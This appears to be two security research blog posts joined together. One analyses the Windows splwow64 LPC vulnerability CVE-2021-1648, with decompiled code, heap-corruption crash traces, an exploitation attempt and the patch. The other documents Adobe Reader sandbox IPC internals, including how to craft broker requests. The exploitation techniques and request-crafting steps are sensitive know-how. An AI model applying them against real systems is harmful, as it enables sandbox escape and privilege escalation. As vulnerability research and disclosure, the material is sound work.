I won’t regurgitate how the LPC interface works; for that, I recommend reading Kaspersky’s Operation Powerfall post[3] as well as the blog by ByteRaptor[4]. Both of these cover the architecture of the vector well enough to understand what’s happening. Instead, we’ll focus on what’s changed since CVE-2020-0986.

To catch you up very briefly, though: splwow64 exposes an LPC endpoint that any process can connect to and send requests. These requests carry opcodes and input parameters to a variety of printer functions (OpenPrinter, ClosePrinter, etc.). These functions occasionally require pointers as input, and thus the input buffer needs to support those.

As alluded to, Microsoft chose to instead use offsets in the LPC request buffers instead of raw pointers. Since the input/output addresses were to be used in memcpy’s, they need to be translated back from offsets to absolute addresses. The functions UMPDStringFromPointerOffset, UMPDPointerFromOffset, and UMPDOffsetFromPointer were added to accomodate this need. Here’s UMPDPointerFromOffset:

int64 UMPDPointerFromOffset(unsigned int64 *lpOffset, int64 lpBufStart, unsigned int dwSize)
{
  unsigned int64 Offset;

  if ( lpOffset && lpBufStart )
  {
    Offset = *lpOffset;
    if ( !*lpOffset )
      return 1;
    if ( Offset <= 0x7FFFFFFF && Offset + dwSize <= 0x7FFFFFFF )
    {
      *lpOffset = Offset + lpBufStart;
      return 1;
    }
  }
  return 0;
}

So as per the GP0 post, the buffer addresses are indeed restricted to <=0x7fffffff. Implicit in this is also the fact that our offset is unsigned, meaning we can only work with positive numbers; therefore, if our target address is somewhere below our lpBufStart, we’re out of luck.

This new offset strategy kills the previous techniques used to exploit this vulnerability. Under CVE-2020-0986, they exploited the memcpy by targeting a global function pointer. When request 0x6A is called, a function (bLoadSpooler) is used to resolve a dozen or so winspool functions used for interfacing with printers:

These global variables are “protected” by RtlEncodePointer, as detailed by Kaspersky[3], but this is relatively trivial to break when executing locally. Using the memcpy with arbitrary src/dst addresses, they were able to overwrite the function pointers and replace one with a call to LoadLibrary.

Unfortunately, now that offsets are used, we can no longer target any arbitrary address. Not only are we restricted to 32-bit addresses, but we are also restricted to addresses >= the message buffer and <= 0x7fffffff.

I had a few thoughts/strategies here. My first attempt was to target UMPD cookies. This was part of a mitigation added after 0986 as again described by Kaspersky. Essentially, in order to invoke the other functions available to splwow64, we need to open a handle to a target printer. Doing this, GDI creates a cookie for us and stores it in an internal linked list. The cookie is created by LoadUserModePrinterDriverEx and is of type UMPD:

typedef struct _UMPD {
    DWORD               dwSignature;        // data structure signature
    struct _UMPD *      pNext;             // linked list pointer
    PDRIVER_INFO_2W     pDriverInfo2;       // pointer to driver info
    HINSTANCE           hInst;              // instance handle to user-mode printer driver module
    DWORD               dwFlags;            // misc. flags
    BOOL                bArtificialIncrement; // indicates if the ref cnt has been bumped up to
    DWORD               dwDriverVersion;    // version number of the loaded driver
    INT                 iRefCount;          // reference count
    struct ProxyPort *  pp;                 // UMPD proxy server
    KERNEL_PVOID        umpdCookie;         // cookie returned back from proxy
    PHPRINTERLIST       pHandleList;        // list of hPrinter's opened on the proxy server
    PFN                 apfn[INDEX_LAST];   // driver function table
} UMPD, *PUMPD;

When a request for a printer action comes in, GDI will check if the request contains a valid printer handle and a cookie for it exists. Conveniently, there’s a function pointer table at the end of the UMPD structure called by a number of LPC functions. By using the pointer to the head of the cookie list, a global variable, we can inspect the list:

0:006> dq poi(g_ulLastUmpdCookie-8)
00000000`00bce1e0  00000000`fedcba98 00000000`00000000
00000000`00bce1f0  00000000`00bcdee0 00007ffb`64dd0000
00000000`00bce200  00000000`00000001 00000001`00000000
00000000`00bce210  00000000`00000000 00000000`00000001
00000000`00bce220  00000000`00bc8440 00007ffb`64dd2550
00000000`00bce230  00007ffb`64dd2d20 00007ffb`64dd2ac0
00000000`00bce240  00007ffb`64dd2de0 00007ffb`64dd30f0
00000000`00bce250  00000000`00000000
0:006> dps poi(g_ulLastUmpdCookie-8)+(8*9) l5
00000000`00bce228  00007ffb`64dd2550 mxdwdrv!DrvEnablePDEV
00000000`00bce230  00007ffb`64dd2d20 mxdwdrv!DrvCompletePDEV
00000000`00bce238  00007ffb`64dd2ac0 mxdwdrv!DrvDisablePDEV
00000000`00bce240  00007ffb`64dd2de0 mxdwdrv!DrvEnableSurface
00000000`00bce248  00007ffb`64dd30f0 mxdwdrv!DrvDisableSurface

This is the first UMPD cookie entry, and we can see its function table contains 5 entries. Conveniently all of these heap addresses are 32-bit.

Unfortunately, none of these functions are called from splwow64 LPC. When processing the LPC requests, the following check is performed on the received buffer:

1	`(MType = lpMsgBuf[1], MType >= 0x6A) && (MType <= 0x6B \|\| MType - 109 <= 7) )`

This effectively limits the functions we can call to 0x6a through 0x74, and the only times the function tables are referenced are prior to 0x6a.

Another strategy I looked at was abusing the fact that request buffers are allocated from the same heap, and thus linear. Essentially, I wanted to see if I could TOCTTOU the buffer by overwriting the memcpy destination after it’s transformed from an offset to an address, but before it’s processed. Since the splwow64 process is disposable and we can crash it as often as we’d like without impacting system stability, it seems possible. After tinkering with heap allocations for awhile, I discovered a helpful primitive.

When a request comes into the LPC server, splwow64 will first allocate a buffer and then copy the request into it:

MessageSize = 0;
if ( *(_WORD *)ProxyMsg == 0x20 && *((_QWORD *)this + 9) )
{
  MessageSize = *((_DWORD *)ProxyMsg + 10);
  if ( MessageSize - 16 > 0x7FFFFFEF )
    goto LABEL_66;
  lpMsgBuf = (unsigned int *)operator new[](MessageSize);
}

...

if ( lpMsgBuf )
{
  rMessageSize = MessageSize;
  memcpy_s(lpMsgBuf, MessageSize, *((const void *const *)ProxyMsg + 6), MessageSize);
  ...
}

Notice there are effectively no checks on the message size; this gives us the ability to allocate chunks of arbitrary size. What’s more is that once the request has finished processing, the output is copied back to the memory view and the buffer is released. Since the Windows heap aggressively returns free chunks of same sized requests, we can obtain reliable read/write into another message buffer. Here’s the leaked heap address after several runs:

PortView 1008 heap: 0x0000000000DD9E90
PortView 1020 heap: 0x0000000002B43FE0
PortView 1036 heap: 0x0000000000DD9E90
PortView 1048 heap: 0x0000000002B43FE0
PortView 1060 heap: 0x0000000000DD9E90
PortView 1072 heap: 0x0000000002B43FE0
PortView 1084 heap: 0x0000000000DD9E90
PortView 1096 heap: 0x0000000002B43FE0
PortView 1108 heap: 0x0000000000DD9E90
PortView 1120 heap: 0x0000000002B43FE0
PortView 1132 heap: 0x0000000000DD9E90
PortView 1144 heap: 0x0000000002B43FE0
PortView 1156 heap: 0x0000000000DD9E90
PortView 1168 heap: 0x0000000002B43FE0
PortView 1180 heap: 0x0000000000DD9E90
PortView 1192 heap: 0x0000000002B43FE0
PortView 1204 heap: 0x0000000000DD9E90
PortView 1216 heap: 0x0000000002B43FE0
PortView 1228 heap: 0x0000000000DD9E90
PortView 1240 heap: 0x0000000002B43FE0

Since we can only write to addresses ahead of ours, we can use 0xdd9e90 to write into 0x2b43fe0 (offset of 0x1d6a150). Note that these allocations are coming out of the front-end allocator due to their size, but as previously mentioned, we’ve got a lot of control there.

After a few hours and a lot of threads, I abandoned this approach as I was unable to trigger an appropriately timed overwrite. I found a memory leak in the port connection code, but it’s tiny (0x18 bytes) and doesn’t improve the odds, no matter how much pressure I put on the heap. I next attempted to target the message type field; maybe the connection timing was easier to land. Recall that splwow64 restricts the message type we can request. This is because certain message types are considered “privileged”. How privileged, you ask? Well, let’s see what 0x76 does:

case 0x76u:
  v3 = *(_QWORD *)(lpMsgBuf + 32);
  if ( v3 )
  {
    memcpy_0(*(void **)(lpMsgBuf + 32), *(const void **)(lpMsgBuf + 24), *(unsigned int *)(lpMsgBuf + 40));
    *a2 = v3;
  }

A fully controlled memcpy with zero checks on the values passed. If we could gain access to this we could use the old techniques used to exploit this vulnerability.

After rigging up some threads to spray, I quickly identified a crash:

(1b4.1a9c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!RtlpAllocateHeap+0x833:
00007ff9`ab669e83 4d8b4a08        mov     r9,qword ptr [r10+8] ds:00000076`00000008=????????????????
0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff9`ab6673d4     : 00000000`01500000 00000000`00800003 00000000`00002000 00000000`00002010 : ntdll!RtlpAllocateHeap+0x833
01 00007ff9`ab6b76e7     : 00000000`00000000 00000000`012a0180 00000000`00000000 00000000`00000000 : ntdll!RtlpAllocateHeapInternal+0x6d4
02 00007ff9`ab6b75f9     : 00000000`01500000 00000000`00000000 00000000`012a0180 00000000`00000080 : ntdll!RtlpAllocateUserBlockFromHeap+0x63
03 00007ff9`ab667eda     : 00000000`00000000 00000000`00000310 00000000`000f0000 00000000`00000001 : ntdll!RtlpAllocateUserBlock+0x111
04 00007ff9`ab666e2c     : 00000000`012a0000 00000000`00000000 00000000`00000300 00000000`00000000 : ntdll!RtlpLowFragHeapAllocFromContext+0x88a
05 00007ff9`a9f39d40     : 00000000`00000000 00000000`00000300 00000000`00000000 00007ff9`a9f70000 : ntdll!RtlpAllocateHeapInternal+0x12c
06 00007ff6`faeac57f     : 00000000`00000300 00000000`00000000 00000000`01509fd0 00000000`00000000 : msvcrt!malloc+0x70
07 00007ff6`faea7c76     : 00000000`00000300 00000000`01509fd0 00000000`015018e0 00000000`00000000 : splwow64!operator new+0x23
08 00007ff6`faea8ada     : 00000000`00000000 00000000`01501678 00000000`0150e340 00000000`0150e4f0 : splwow64!TLPCMgr::ProcessRequest+0x9e

That’s the format of our spray, but you’ll notice it’s crashing during allocation. Basically, the message buffer chunk was freed and we’ve managed to overwrite the freelist chunk’s forward link prior to it being reused. Once our next request comes in, it attempts to allocate a chunk out of this sized bucket and crashes walking the list.

Notably, we can also corrupt a busy chunk’s header, leading to a crash during the free process:

0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ffe`1d5b7e42     : 00000000`00000000 00007ffe`1d6187f0 00000000`00000003 00000000`014d0000 : ntdll!RtlReportCriticalFailure+0x56
01 00007ffe`1d5b812a     : 00000000`00000003 00000000`02d7f440 00000000`014d0000 00000000`014d9fc8 : ntdll!RtlpHeapHandleError+0x12
02 00007ffe`1d5bdd61     : 00000000`00000000 00000000`014d0150 00000000`00000000 00000000`014d9fd0 : ntdll!RtlpHpHeapHandleError+0x7a
03 00007ffe`1d555869     : 00000000`014d9fc0 00000000`00000055 00000000`00000000 00007ffe`00000027 : ntdll!RtlpLogHeapFailure+0x45
04 00007ffe`1d4c0df1     : 00000000`014d02e8 00000000`00000055 00000000`00000001 00000000`00000055 : ntdll!RtlpHeapFindListLookupEntry+0x94029
05 00007ffe`1d4c480b     : 00000000`014d0000 00000000`014d9fc0 00000000`014d9fc0 00000000`00000080 : ntdll!RtlpFindEntry+0x4d
06 00007ffe`1d4c95c4     : 00000000`014d0000 00000000`014d0000 00000000`014d9fc0 00000000`014d0000 : ntdll!RtlpFreeHeap+0x3bbcd s
07 00007ffe`1d4c5d21     : 00000000`00000000 00000000`014d0000 00000000`00000000 00000000`00000000 : ntdll!RtlpFreeHeapInternal+0x464
08 00007ffe`1cdf9c9c     : 00000000`030c1490 00000000`014d9fd0 00000000`014d9fd0 00000000`00000000 : ntdll!RtlFreeHeap+0x51
09 00007ff7`28b8805d     : 00000000`030c1490 00000000`014d9fd0 00000000`00000000 00000000`00000000 : msvcrt!free+0x1c
0a 00007ff7`28b88ada     : 00000000`00000000 00000000`00000000 00000000`030c0cd0 00000000`030c0d00 : splwow64!TLPCMgr::ProcessRequest+0x485

This is an interesting primitive because it grants us full control over a heap chunk, both free and busy, but unlike the browser world, full of its class objects and vtables, our message buffer is flat, already assumed to be untrustworthy. This means we can’t just overwrite a function pointer or modify an object length. Furthermore, the lifespan of the object is quite short. Once the message has been processed and the response copied back to the shared memory region, the chunk is released.

I spent quite a bit of time digging into public work on NT/LF heap exploitation primitives in modern Windows 10, but came up empty. Most work these days focuses on browser heaps and, typically, abusing object fields to gain code execution or AAR/AAW. @scwuaptx[7] has a great paper on modern heap internals/primitives[6] and an example from a CTF in ‘19[5], but ends up using a FILE object to gain r/w which is unavailable here.

While I wasn’t able to take this to full code execution, I’m fairly confident this is doable provided the right heap primitive comes along. I was able to gain full control over a free and busy chunk with valid headers (leaking the heap encoding cookie), but Microsoft has killed all the public techniques, and I don’t have the motivation to find new ones (for now ;P).

The code is available on Github[8], which is based on the public PoC. It uses my technique described above to leak the heap cookie and smash a free chunk’s flink.

Patch

Microsoft patched this in January, just a few weeks after Project Zero FD’d the bug. They added a variety of things to the function, but the crux of the patch now requires a buffer size which is then used as a bounds check before performing memcpy’s.

GdiPrinterThunk now checks if DisableUmpdBufferSizeCheck is set in HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize. If it’s not, GdiPrinterThunk_Unpatched is used, otherwise, GdiPrinterThunk_Patched. I can only surmise that they didn’t want to break compatibility with…something, and decided to implement a hack while they work on a more complete solution (AppContainer..?). The new GdiPrinterThunk:

int GdiPrinterThunk(int MsgBuf, int MsgBufSize, int MsgOut, unsigned int MsgOutSize)
{
  int result;

  if ( gbIsUmpdBufferSizeCheckEnabled )
    result = GdiPrinterThunk_Patched(MsgBuf, MsgBufSize, (__int64 *)MsgOut, MsgOutSize);
  else
    result = GdiPrinterThunk_Unpatched(MsgBuf, (__int64 *)rval, rval);
  return result;
}

Along with the buf size they now also require the return buffer size and check to ensure it’s sufficiently large enough to hold output (this is supplied by the ProxyMsg in splwow64).

And the specific patch for the 0x6d memcpy:

SrcPtr = **MsgBuf_Off80;
if ( SrcPtr )
{
  SizeHigh = SrcPtr[34];
  DstPtr = *(void **)(MsgBuf + 88);
  dwCopySize = SizeHigh + SrcPtr[35];
  if ( DstPtr + dwCopySize <= _BufEnd        // ensure we don't write past the end of the MsgBuf
    && (unsigned int)dwCopySize >= SizeHigh  // ensure total is at least >= SizeHigh
    && (unsigned int)dwCopySize <= 0x1FFFE ) // sanity check WORD boundary
  {
    memcpy_0(DstPtr, SrcPtr, v276 + SrcPtr[35]);
  }
}

It’s a little funny at first and seems like an incomplete patch, but it’s because Microsoft has removed (or rather, inlined) all of the previous UMPDPointerFromOffset calls. It still exists, but it’s only called from within UMPDStringPointerFromOffset_Patched and now named UMPDPointerFromOffset_Patched. Here’s how they’ve replaced the source offset conversion/check:

MCpySrcPtr = (unsigned __int64 *)(MsgBuf + 80);
if ( MsgBuf == -80 )
  goto LABEL_380;

MCpySrc = *MCpySrcPtr;
if ( *MCpySrcPtr )
{
  // check if the offset is less than the MsgBufSize and if it's at least 8 bytes past the src pointer struct (contains size words)
  if ( MCpySrc > (unsigned int)_MsgBufSize || (unsigned int)_MsgBufSize - MCpySrc < 8 )
    goto LABEL_380;
  
  // transform offset to pointer
  *MCpySrcPtr = MCpySrc + MsgBuf;
}

It seems messier this way, but is probably just compiler optimization. MCpySrc is the address of the source struct, which is:

typedef struct SrcPtr {
  DWORD offset;
  WORD SizeHigh;
  WORD SizeLow;
};

Size is likely split out for additional functionality in other LPC functions, but I didn’t bother figuring out why. The destination offset/pointer is resolved in a similar fashion.

Funny enough, the GdiPrinterThunk_Unpatched really is unpatched; the vulnerable memcpy code lives on.

References

[0] https://bugs.chromium.org/p/project-zero/issues/detail?id=2096
[1] https://whereisk0shl.top/post/the_story_of_cve_2021_1648
[2] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1648
[3] https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/
[4] https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html
[5] https://github.com/scwuaptx/LazyFragmentationHeap/blob/master/LazyFragmentationHeap_slide.pdf
[6] https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version
[7] https://twitter.com/scwuaptx
[8] https://github.com/hatRiot/bugs/tree/master/cve20211648

http://dronesec.pw/
Digging the Adobe Sandbox - IPC InternalsBryan Alexander
7 August 2020 at 21:10

Digging the Adobe Sandbox - IPC Internals

http://dronesec.pw/

By: Bryan Alexander

7 August 2020 at 21:10

This post kicks off a short series into reversing the Adobe Reader sandbox. I initially started this research early last year and have been working on it off and on since. This series will document the Reader sandbox internals, present a few tools for reversing/interacting with it, and a description of the results of this research. There may be quite a bit of content here, but I’ll be doing a lot of braindumping. I find posts that document process, failure, and attempt to be far more insightful as a researcher than pure technical result.

I’ve broken this research up into two posts. Maybe more, we’ll see. The first here will detail the internals of the sandbox and introduce a few tools developed, and the second will focus on fuzzing and the results of that effort.

This post focuses primarily on the IPC channel used to communicate between the sandboxed process and the broker. I do not delve into how the policy engine works or many of the restrictions enabled.

Introduction

This is by no means the first dive into the Adobe Reader sandbox. Here are a few prior examples of great work:

2011 – A Castle Made of Sand (Richard Johnson)
2011 – Playing in the Reader X Sandbox (Paul Sabanal and Mark Yason)
2012 – Breeding Sandworms (Zhenhua Liu and Guillaume Lovet)
2013 – When the Broker is Broken (Peter Vreugdenhil)

Breeding Sandworms was a particularly useful introduction to the sandbox, as it describes in some detail the internals of transaction and how they approached fuzzing the sandbox. I’ll detail my approach and improvements in part two of this series.

In addition, the ZDI crew of Abdul-Aziz Hariri, et al. have been hammering on the Javascript side of things for what seems like forever (Abusing Adobe Reader’s Javascript APIs) and have done some great work in this area.

After evaluating existing research, however, it seemed like there was more work to be done in a more open source fashion. Most sandbox escapes in Reader these days opt instead to target Windows itself via win32k/dxdiag/etc and not the sandbox broker. This makes some sense, but leaves a lot of attack surface unexplored.

Note that all research was done on Acrobat Reader DC 20.6.20034 on a Windows 10 machine. You can fetch installers for old versions of Adobe Reader here. I highly recommend bookmarking this. One of my favorite things to do on a new target is pull previous bugs and affected versions and run through root cause and exploitation.

Sandbox Internals Overview

Adobe Reader’s sandbox is known as protected mode and is on by default, but can be toggled on/off via preferences or the registry. Once Reader launches, a child process is spawned under low integrity and a shared memory section mapped in. Inter-process communication (IPC) takes place over this channel, with the parent process acting as the broker.

Adobe actually published some of the sandbox source code to Github over 7 years ago, but it does not contain any of their policies or modern tag interfaces. It’s useful for figuring out variables and function names during reversing, and the source code is well written and full of useful comments, so I recommend pulling it up.

Reader uses the Chromium sandbox (pre Mojo), and I recommend the following resources for the specifics here:

These days it’s known as the “legacy IPC” and has been replaced by Mojo in Chrome. Reader actually uses Mojo to communicate between its RdrCEF (Chromium Embedded Framework) processes which handle cloud connectivity, syncing, etc. It’s possible Adobe plans to replace the broker legacy API with Mojo at some point, but this has not been announced/released yet.

We’ll start by taking a brief look at how a target process is spawned, but the main focus of this post will be the guts of the IPC mechanisms in play. Execution of the child process first begins with BrokerServicesBase::SpawnTarget. This function crafts the target process and its restrictions. Some of these are described here in greater detail, but they are as follows:

1. Create restricted token
 - via `CreateRestrictedToken`
 - Low integrity or AppContainer if available
2. Create restricted job object
 - No RW to clipboard
 - No access to user handles in other processes
 - No message broadcasts
 - No global hooks
 - No global atoms table access
 - No changes to display settings
 - No desktop switching/creation
 - No ExitWindows calls
 - No SystemParamtersInfo
 - One active process
 - Kill on close/unhandled exception

From here, the policy manager enforces interceptions, handled by the InterceptionManager, which handles hooking and rewiring various Win32 functions via the target process to the broker. According to documentation, this is not for security, but rather:

[..] designed to provide compatibility when code inside the sandbox cannot be modified to cope with sandbox restrictions. To save unnecessary IPCs, policy is also evaluated in the target process before making an IPC call, although this is not used as a security guarantee but merely a speed optimization.

From here we can now take a look at how the IPC mechanisms between the target and broker process actually work.

The broker process is responsible for spawning the target process, creating a shared memory mapping, and initializing the requisite data structures. This shared memory mapping is the medium in which the broker and target communicate and exchange data. If the target wants to make an IPC call, the following happens at a high level:

The target finds a channel in a free state
The target serializes the IPC call parameters to the channel
The target then signals an event object for the channel (ping event)
The target waits until a pong event is signaled

At this point, the broker executes ThreadPingEventReady, the IPC processor entry point, where the following occurs:

The broker deserializes the call arguments in the channel
Sanity checks the parameters and the call
Executes the callback
Writes the return structure back to the channel
Signals that the call is completed (pong event)

There are 16 channels available for use, meaning that the broker can service up to 16 concurrent IPC requests at a time. The following diagram describes a high level view of this architecture:

From the broker’s perspective, a channel can be viewed like so:

In general, this describes what the IPC communication channel between the broker and target looks like. In the following sections we’ll take a look at these in more technical depth.

IPC Internals

The IPC facilities are established via TargetProcess::Init, and is really what we’re most interested in. The following snippet describes how the shared memory mapping is created and established between the broker and target:

  DWORD shared_mem_size = static_cast<DWORD>(shared_IPC_size +
                                             shared_policy_size);
  shared_section_.Set(::CreateFileMappingW(INVALID_HANDLE_VALUE, NULL,
                                           PAGE_READWRITE | SEC_COMMIT,
                                           0, shared_mem_size, NULL));
  if (!shared_section_.IsValid()) {
    return ::GetLastError();
  }

  DWORD access = FILE_MAP_READ | FILE_MAP_WRITE;
  base::win::ScopedHandle target_shared_section;
  if (!::DuplicateHandle(::GetCurrentProcess(), shared_section_,
                         sandbox_process_info_.process_handle(),
                         target_shared_section.Receive(), access, FALSE, 0)) {
    return ::GetLastError();
  }

  void* shared_memory = ::MapViewOfFile(shared_section_,
                                        FILE_MAP_WRITE|FILE_MAP_READ,
                                        0, 0, 0);

The calculated shared_mem_size in the source code here comes out to 65536 bytes, which isn’t right. The shared section is actually 0x20000 bytes in modern Reader binaries.

Once the mapping is established and policies copied in, the SharedMemIPCServer is initialized, and this is where things finally get interesting. SharedMemIPCServer initializes the ping/pong events for communication, creates channels, and registers callbacks.

The previous architecture diagram provides an overview of the structures and layout of the section at runtime. In short, a ServerControl is a broker-side view of an IPC channel. It contains the server side event handles, pointers to both the channel and its buffer, and general information about the connected IPC endpoint. This structure is not visible to the target process and exists only in the broker.

A ChannelControl is the target process version of a ServerControl; it contains the target’s event handles, the state of the channel, and information about where to find the channel buffer. This channel buffer is where the CrossCallParams can be found as well as the call return information after a successful IPC dispatch.

Let’s walk through what an actual request looks like. Making an IPC request requires the target to first prepare a CrossCallParams structure. This is defined as a class, but we can model it as a struct:

const size_t kExtendedReturnCount = 8;

struct CrossCallParams {
  uint32 tag_;
  uint32 is_in_out_;
  CrossCallReturn call_return;
  size_t params_count_;
};

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

union MultiType {
  uint32 unsigned_int;
  void* pointer;
  HANDLE handle;
  ULONG_PTR ulong_ptr;
};

I’ve also gone ahead and defined a few other structures needed to complete the picture. Note that the return structure, CrossCallReturn, is embedded within the body of the CrossCallParams.

There’s a great ASCII diagram provided in the sandbox source code that’s highly instructive, and I’ve duplicated it below:

// [ tag                4 bytes]
// [ IsOnOut            4 bytes]
// [ call return       52 bytes]
// [ params count       4 bytes]
// [ parameter 0 type   4 bytes]
// [ parameter 0 offset 4 bytes] ---delta to ---\
// [ parameter 0 size   4 bytes]                |
// [ parameter 1 type   4 bytes]                |
// [ parameter 1 offset 4 bytes] ---------------|--\
// [ parameter 1 size   4 bytes]                |  |
// [ parameter 2 type   4 bytes]                |  |
// [ parameter 2 offset 4 bytes] ----------------------\
// [ parameter 2 size   4 bytes]                |  |   |
// |---------------------------|                |  |   |
// | value 0     (x bytes)     | <--------------/  |   |
// | value 1     (y bytes)     | <-----------------/   |
// |                           |                       |
// | end of buffer             | <---------------------/
// |---------------------------|

A tag is a dword indicating which function we’re invoking (just a number between 1 and approximately 255, depending on your version). This is handled server side dynamically, and we’ll explore that further later on.

Each parameter is then sequentially represented by a ParamInfo structure:

struct ParamInfo {
  ArgType type_;
  ptrdiff_t offset_;
  size_t size_;
};

The offset is the delta value to a region of memory somewhere below the CrossCallParams structure. This is handled in the Chromium source code via the ptrdiff_t type.

Let’s look at a call in memory from the target’s perspective. Assume the channel buffer is at 0x2a10134:

0:009> dd 2a10000+0x134
02a10134  00000003 00000000 00000000 00000000
02a10144  00000000 00000000 000002cc 00000001
02a10154  00000000 00000000 00000000 00000000
02a10164  00000000 00000000 00000000 00000007
02a10174  00000001 000000a0 00000086 00000002
02a10184  00000128 00000004 00000002 00000130
02a10194  00000004 00000002 00000138 00000004
02a101a4  00000002 00000140 00000004 00000002

0x2a10134 shows we’re invoking tag 3, which carries 7 parameters (0x2a10170). The first argument is type 0x1 (we’ll describe types later on), is at delta offset 0xa0, and is 0x86 bytes in size. Thus:

0:009> dd 2a10000+0x134+0xa0
02a101d4  003f005c 005c003f 003a0043 0055005c
02a101e4  00650073 00730072 0062005c 0061006a
02a101f4  006a0066 0041005c 00700070 00610044
02a10204  00610074 004c005c 0063006f 006c0061
02a10214  006f004c 005c0077 00640041 0062006f
02a10224  005c0065 00630041 006f0072 00610062
02a10234  005c0074 00430044 0052005c 00610065
02a10244  00650064 004d0072 00730065 00610073
0:009> du 2a10000+0x134+0xa0
02a101d4  "\??\C:\Users\bjaff\AppData\Local"
02a10214  "Low\Adobe\Acrobat\DC\ReaderMessa"
02a10254  "ges"

This shows the delta of the parameter data and, based on the parameter type, we know it’s a unicode string.

With this information, we can craft a buffer targeting IPC tag 3 and move onto sending it. To do this, we require the IPCControl structure. This is a simple structure defined at the start of the IPC shared memory section:

struct IPCControl {
    size_t channels_count;
    HANDLE server_alive;
    ChannelControl channels[1];
};

And in the IPC shared memory section:

1
2
3

0:009> dd 2a10000
02a10000  0000000f 00000088 00000134 00000001
02a10010  00000010 00000014 00000003 00020134

So we have 16 channels, a handle to server_alive, and the start of our ChannelControl array.

The server_alive handle is a mutex used to signal if the server has crashed. It’s used during tag invocation in SharedmemIPCClient::DoCall, which we’ll describe later on. For now, assume that if we WaitForSingleObject on this and it returns WAIT_ABANDONED, the server has crashed.

ChannelControl is a structure that describes a channel, and is again defined as:

struct ChannelControl {
  size_t channel_base;
  volatile LONG state;
  HANDLE ping_event;
  HANDLE pong_event;
  uint32 ipc_tag;
};

The channel_base describes the channel’s buffer, ie. where the CrossCallParams structure can be found. This is an offset from the base of the shared memory section.

state is an enum that describes the state of the channel:

enum ChannelState {
  kFreeChannel = 1,
  kBusyChannel,
  kAckChannel,
  kReadyChannel,
  kAbandonnedChannel
};

The ping and pong events are, as previously described, used to signal to the opposite endpoint that data is ready for consumption. For example, when the client has written out its CrossCallParams and ready for the server, it signals:

  DWORD wait = ::SignalObjectAndWait(channel[num].ping_event,
                                     channel[num].pong_event,
                                     kIPCWaitTimeOut1,
                                     FALSE);

When the server has completed processing the request, the pong_event is signaled and the client reads back the call result.

A channel is fetched via SharedMemIPCClient::LockFreeChannel and is invoked when GetBuffer is called. This simply identifies a channel in the IPCControl array wherein state == kFreeChannel, and sets it to kBusyChannel. With a channel, we can now write out our CrossCallParams structure to the shared memory buffer. Our target buffer begins at channel->channel_base.

Writing out the CrossCallParams has a few nuances. First, the number of actual parameters is NUMBER_PARAMS+1. According to the source:

// Note that the actual number of params is NUMBER_PARAMS + 1
// so that the size of each actual param can be computed from the difference
// between one parameter and the next down. The offset of the last param
// points to the end of the buffer and the type and size are undefined.

This can be observed in the CopyParamIn function:

param_info_[index + 1].offset_ = Align(param_info_[index].offset_ +
                                            size);
param_info_[index].size_ = size;
param_info_[index].type_ = type;

Note the offset written is the offset for index+1. In addition, this offset is aligned. This is a pretty simple function that byte aligns the delta inside the channel buffer:

// Increases |value| until there is no need for padding given the 2*pointer
// alignment on the platform. Returns the increased value.
// NOTE: This might not be good enough for some buffer. The OS might want the
// structure inside the buffer to be aligned also.
size_t Align(size_t value) {
  size_t alignment = sizeof(ULONG_PTR) * 2;
    return ((value + alignment - 1) / alignment) * alignment;
    }

Because the Reader process is x86, the alignment is always 8.

The pseudo-code for writing out our CrossCallParams can be distilled into the following:

write_uint(buffer,     tag);
write_uint(buffer+0x4, is_in_out);

// reserve 52 bytes for CrossCallReturn
write_crosscall_return(buffer+0x8);

write_uint(buffer+0x3c, param_count);

// calculate initial delta 
delta = ((param_count + 1) * 12) + 12 + 52;

// write out the first argument's offset 
write_uint(buffer + (0x4 * (3 * 0 + 0x11)), delta);

for idx in range(param_count):
    
    write_uint(buffer + (0x4 * (3 * idx + 0x10)), type);
    write_uint(buffer + (0x4 * (3 * idx + 0x12)), size);

    // ...write out argument data. This varies based on the type

    // calculate new delta
    delta = Align(delta + size)
    write_uint(buffer + (0x4 * (3 * (idx+1) + 0x11)), delta);

// finally, write the tag out to the ChannelControl struct
write_uint(channel_control->tag, tag);

Once the CrossCallParams structure has been written out, the sandboxed process signals the ping_event and the broker is triggered.

Broker side handling is fairly straightforward. The server registers a ping_event handler during SharedMemIPCServer::Init:

1 2	`thread_provider_->RegisterWait(this, service_context->ping_event, ThreadPingEventReady, service_context);`

RegisterWait is just a thread pool wrapper around a call to RegisterWaitForSingleObject.

The ThreadPingEventReady function marks the channel as kAckChannel, fetches a pointer to the provided buffer, and invokes InvokeCallback. Once this returns, it copies the CrossCallReturn structure back to the channel and signals the pong_event mutex.

InvokeCallback parses out the buffer and handles validation of data, at a high level (ensures strings are strings, buffers and sizes match up, etc.). This is probably a good time to document the supported argument types. There are 10 types in total, two of which are placeholder:

ArgType = {
    0: "INVALID_TYPE",
    1: "WCHAR_TYPE", 
    2: "ULONG_TYPE",
    3: "UNISTR_TYPE", # treated same as WCHAR_TYPE
    4: "VOIDPTR_TYPE",
    5: "INPTR_TYPE",
    6: "INOUTPTR_TYPE",
    7: "ASCII_TYPE",
    8: "MEM_TYPE", 
    9: "LAST_TYPE" 
}

These are taken from internal_types, but you’ll notice there are two additional types: ASCII_TYPE and MEM_TYPE, and are unique to Reader. ASCII_TYPE is, as expected, a simple 7bit ASCII string. MEM_TYPE is a memory structure used by the broker to read data out of the sandboxed process, ie. for more complex types that can’t be trivially passed via the API. It’s additionally used for data blobs, such as PNG images, enhanced-format datafiles, and more.

Some of these types should be self-explanatory; WCHAR_TYPE is naturally a wide char, ASCII_TYPE an ascii string, and ULONG_TYPE a ulong. Let’s look at a few of the non-obvious types, however: VOIDPTR_TYPE, INPTR_TYPE, INOUTPTR_TYPE, and MEM_TYPE.

